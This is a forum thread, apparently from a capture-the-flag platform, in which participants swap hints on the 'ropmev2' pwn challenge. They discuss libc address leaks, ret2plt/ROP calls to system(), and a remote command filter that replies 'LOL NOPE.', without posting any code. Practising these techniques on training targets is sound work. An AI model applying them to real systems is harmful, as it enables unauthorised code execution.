ropmev2 pwn challenge

Hi all,
I’m looking for a hint on what I’m doing wrong on this challenge. I am able to open a shell in the local binary. I adapted the binary to leak the remote printf address and calculate the correct remote libc functions addresses. However no remote shell is spawned and I receive the "LOL NOPE." message.
I am able to use arbitrary strings when I call the local and remote system() libc function. I tried with /bin/bash, /bin/sh, flag, getflag, cat flag.txt, etc... without success. I still receive the string "LOL NOPE."

Do you have any hints? Any help really appreciated?

Thank you

Comments

  • Think outside the box.
    You are getting that message bacause ..?
    Programmer knew you are gonna try ret2plt. He also knew you are gonna use that /bin/sh string address you leaked.
    You are getting LOL NOPE. message.
    So you can assume, that /bin/sh is not the real shell you want it to be.

    fasetto

  • Type your comment> @fasetto said:

    Think outside the box.
    You are getting that message bacause ..?
    Programmer knew you are gonna try ret2plt. He also knew you are gonna use that /bin/sh string address you leaked.
    You are getting LOL NOPE. message.
    So you can assume, that /bin/sh is not the real shell you want it to be.

    yeah you got that right

    R4J

  • Thank you for the hint. Finally I did it!

  • i used r***() function in ROP, but cant get any shell, i get EOF. help please in PM, thanks

    peek

  • ok done

    peek

  • Type your comment> @fasetto said:

    Think outside the box.
    You are getting that message bacause ..?
    Programmer knew you are gonna try ret2plt. He also knew you are gonna use that /bin/sh string address you leaked.
    You are getting LOL NOPE. message.
    So you can assume, that /bin/sh is not the real shell you want it to be.

    I just solved it (Using some obscure way cause it didn't cross my mind that they were just filtering certain elements)
    Anyway: Does anyone know how the filter was implemented? I couldn't find it in the executable (Which may be due to my mediocre RE skills), or is it done any other way? Just curious where the LOL NOPE came from

  • Type your comment> @Galile0 said:

    Type your comment> @fasetto said:

    Think outside the box.
    You are getting that message bacause ..?
    Programmer knew you are gonna try ret2plt. He also knew you are gonna use that /bin/sh string address you leaked.
    You are getting LOL NOPE. message.
    So you can assume, that /bin/sh is not the real shell you want it to be.

    I just solved it (Using some obscure way cause it didn't cross my mind that they were just filtering certain elements)
    Anyway: Does anyone know how the filter was implemented? I couldn't find it in the executable (Which may be due to my mediocre RE skills), or is it done any other way? Just curious where the LOL NOPE came from

    if you got a shell, some commands return LOL NOPE, it's not from the binary

    peek

  • edited August 2019

    @Galile0 said:
    Anyway: Does anyone know how the filter was implemented? I couldn't find it in the executable (Which may be due to my mediocre RE skills), or is it done any other way? Just curious where the LOL NOPE came from

    While I haven't finished this challenge yet, I think you can figure out the filter if you compare a known input, say the alphabet, with what you'll actually end up with if you don't pass DEBUG.

    Edit: After re-reading your message I may have misunderstood and you were instead referring to the filtering of allowed commands on the remote host. Nevermind the above :wink:

  • Ok, that was a fun challenge. Though I felt quite laughed at when getting the LOL NOPE.

  • all done. ez pz. hit me up if you need help. don't worry, it's pretty straightforward.

  • Type your comment> @budyackey said:

    all done. ez pz. hit me up if you need help. don't worry, it's pretty straightforward.

    some tips :smile:

  • Hello,
    Same here i'm stuck with this LOL NOPE message... any hints ? (feel free to PM)

  • I am stuck but feel quite close to the solution if someone could drop me a PM

  • got it to work locally but getting EOF on remote... any hints? pls PM me :)

  • edited October 2019

    Could someone pm me on discord please i am stucked LOL NOPE at server,
    secret#6195

  • (without giving away to many hints) Ugh.. need a nudge here.. (never done a BO from scratch) got the program figured out, and "what" I need to do to get the BO to trigger.. I'm just not sure how to get the right format of the proper stack "command" to put in the right location to get it to run what I want it to run ;) anyone who knows a bit more about BO's can help me .. I'm using r*****2 (c**** does not work properly on my machine)

  • If I just knew what system() does, I could probably figure this one out. If only there was some kind of man-ual that could tell me...
  • Yes. finally did it!

    I got it without using the plt, only used functions in binary. So a bit confused seeing people talk about leaking above.

    I might have missed something really obvious though, as im noob with plt & dynamic stuff. So if anyone who did it this way could pm me their logic, I would much appreciate :)

Sign In to comment.